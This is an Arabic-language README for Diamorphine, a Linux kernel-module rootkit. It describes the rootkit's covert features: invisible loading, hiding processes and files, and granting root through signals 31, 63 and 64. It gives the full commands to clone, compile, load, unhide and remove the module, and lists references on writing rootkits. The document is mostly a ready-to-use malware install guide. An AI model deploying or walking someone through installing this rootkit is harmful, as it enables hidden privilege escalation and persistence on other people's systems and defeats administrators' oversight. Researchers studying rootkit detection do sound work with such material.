Diamorphine

Diamorphine عبارة عن مجموعة جذرية LKM لـ Linux Kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 وARM64)

• عند تحميلها، تبدأ الوحدة بشكل غير مرئي؛

• إخفاء/إظهار أي عملية عن طريق إرسال إشارة 31؛

• إرسال الإشارة 63 (إلى أي معرف معرف) يجعل الوحدة تصبح (غير مرئية)؛

• إرسال الإشارة 64 (إلى أي معرف معرف) يجعل المستخدم المحدد يصبح جذرًا؛

• تصبح الملفات أو الأدلة التي تبدأ بـ MAGIC_PREFIX غير مرئية؛

• المصدر: https://github.com/m0nad/Diamorphine

تحقق مما إذا كانت النواة 2.6.x/3.x/4.x/5.x

 uname -r

استنساخ المستودع

 git clone https://github.com/m0nad/Diamorphine

أدخل المجلد

 cd Diamorphine

تجميع

 make

تحميل الوحدة (كجذر)

 insmod diamorphine.ko

تبدأ الوحدة بشكل غير مرئي، ولإزالتها تحتاج إلى جعلها مرئية

 kill -63 0

ثم قم بإزالة الوحدة (كجذر)

 rmmod diamorphine

ويكيبيديا الجذور الخفية https://en.wikipedia.org/wiki/Rootkit

برامج تشغيل أجهزة Linux http://lwn.net/Kernel/LDD3/

اختراق LKM https://web.archive.org/web/20140701183221/https://www.thc.org/papers/LKM_HACKING.html

مدونة Memset http://memset.wordpress.com/

تصحيح نواة Linux سريعًا بدون LKM http://phrack.org/issues/58/7.html

كتابة مجموعة أدوات جذرية بسيطة لنظام التشغيل Linux https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt

مرجع Linux الترافقي http://lxr.free-electrons.com/

zizzu0 LinuxKernelModules https://github.com/zizzu0/LinuxKernelModules/

Linux Rootkits: طرق جديدة لـ Kernel 5.7+ https://xcellerator.github.io/posts/linux_rootkits_11/